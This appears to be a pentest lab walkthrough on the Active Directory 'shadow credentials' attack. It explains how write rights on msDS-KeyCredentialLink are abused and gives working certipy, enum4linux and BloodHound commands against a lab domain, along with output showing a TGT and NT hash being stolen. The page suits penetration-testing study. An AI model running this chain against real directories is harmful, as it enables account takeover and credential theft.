Shadow Credentials

  • Shadow credentials attack consist of using the GenericAll or GenericWrite privilege on a user or computer to set up the attribute msDS-KeyCredentialLink. explanations here

  • You can get the dacl movement on shutdown (@_nwodtuhs) website, the hacker recipes : https://www.thehacker.recipes/ad/movement/dacl

  • This attack is very usefull when you got Write on another user.

  • With genericWrite you can only do:

    • Target Kerberoasting : add an SPN to a user, do a kerberoasting, unset the spn. But the user password must be weak to the kerberoasting attack work.

    • Set up a logon script : change ldap parameters to set up a logon script. but it implies that the user log to his computer, an smb server or a share to offer the script and setup a script that bypass the security solutions in place)

    • shadow credentials : the attack we want to do, we need a cetificate service on the domain

  • With GenericAll you can :

    • ForceChangePassword : but on a real pentest you don’t want to block a user by changing his password. And this is not very stealthy too. So if you can do another way this is fine :)

    • All the attacks available in the genericWrite part.

So if ADCS is enabled on the domain, and we got write privilege on msDS-KeyCredentialLink, we can do the shadow credentials attack to get a direct access on the user account. And this seems to be the better idea in this case on a real pentest.

  • Shadow credentials is now include with certipy (this attack can also be done with pywisker )

joaquin.Pereida@maryland.local > Marisol.Pedrosa > Teresa.Perez
enum4linux -u joaquin.Pereida@maryland.local -p horse -G 192.168.56.12

Start BloodHound and Neo4j

sudo /usr/bin/./neo4j console
sudo /opt/tools/BloodHound4.2-ly4k/BloodHound-linux-x64/BloodHound  --no-sandbox --disable-dev-shm-usage
certipy shadow auto -u joaquin.Pereida@maryland.local -p 'horse' -account 'marisol.Pedrosa'

  • And we can do the same from Marisol to teresa.Perez

certipy shadow auto -u marisol.Pedrosa@maryland.local -hashes 'fd208d19680104ddb8e3d90962c0334e' -account 'teresa.Perez'
certipy shadow auto -u marisol.Pedrosa@maryland.local -hashes 'fd208d19680104ddb8e3d90962c0334e' -account 'teresa.Perez'
Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Targeting user 'teresa.Perez'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '4d026165-030a-b52a-4ae9-9c0c28eb1fe9'
[*] Adding Key Credential with device ID '4d026165-030a-b52a-4ae9-9c0c28eb1fe9' to the Key Credentials for 'teresa.Perez'
[*] Successfully added Key Credential with device ID '4d026165-030a-b52a-4ae9-9c0c28eb1fe9' to the Key Credentials for 'teresa.Perez'
[*] Authenticating as 'teresa.Perez' with the certificate
[*] Using principal: teresa.perez@maryland.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'teresa.perez.ccache'
[*] Trying to retrieve NT hash for 'teresa.perez'
[*] Restoring the old Key Credentials for 'teresa.Perez'
[*] Successfully restored the old Key Credentials for 'teresa.Perez'
[*] NT hash for 'teresa.Perez': 4d737ec9ecf0b9955a161773cfed9611
PreviousCertifried - CVE-2022–26923NextMetasploit

Last updated